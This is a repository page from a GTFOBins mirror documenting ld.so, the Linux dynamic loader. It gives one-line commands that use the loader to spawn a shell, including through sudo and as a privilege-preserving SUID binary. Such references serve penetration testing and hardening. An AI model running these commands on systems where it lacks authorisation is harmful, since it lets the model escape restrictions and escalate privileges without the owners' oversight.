1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/ld.so.md

17 lines
415 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
2018-05-22 12:40:35 +02:00
description: |
`ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with:
```
$ strings /proc/self/exe | head -1
/lib64/ld-linux-x86-64.so.2
```
2018-05-21 21:14:41 +02:00
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-05-21 21:14:41 +02:00
- code: /lib/ld.so /bin/sh
sudo-enabled:
- code: sudo /lib/ld.so /bin/sh
suid-enabled:
- code: ./ld.so /bin/sh -p
---